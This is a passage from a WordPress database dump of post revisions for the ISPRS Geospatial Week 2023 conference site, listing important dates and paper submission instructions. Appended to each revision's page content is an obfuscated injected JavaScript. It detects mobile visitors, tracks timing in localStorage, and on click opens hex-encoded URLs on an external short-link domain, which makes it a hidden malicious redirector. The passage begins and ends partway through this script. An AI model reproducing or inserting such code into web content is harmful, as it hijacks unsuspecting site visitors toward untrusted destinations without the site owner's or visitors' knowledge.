|\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2022-10-09 01:34:17','2022-10-09 01:34:17','',2654,'https://gsw2023.com/?p=2657',0,'revision','',0),
(2658,1,'2022-10-09 01:35:42','2022-10-09 01:35:42','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>SPRS Geospatial Week: 2-7 September 2023</strong></h5>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>Conference web site and Call for papers: March 2022</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>Paper submissions</strong></h5>\n<ul class=\"nospace\">\n<li>\n<h6><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: July 2023</strong></h6>\n</li>\n</ul>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><strong>Registration deadlines</strong></h5>\n<ul>\n<li>\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2022-10-09 01:35:42','2022-10-09 01:35:42','',2654,'https://gsw2023.com/?p=2658',0,'revision','',0),
(2659,1,'2022-10-09 01:39:00','2022-10-09 01:39:00','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><strong>Important Dates:</strong></p>\n<ol>\n<li><strong>Annals (Fully Reviewed Papers):</strong>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023</li>\n<li>Full paper Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><strong>Archives (Abstract Reviewed Papers):</strong>\n<ul>\n<li>Abstracts submission (Archives): May 15, 2023</li>\n<li>Abstracts Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n<p>&nbsp;</p>\n<p><strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: July 1, 2023</li>\n<li>Late registration deadline: July 21, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 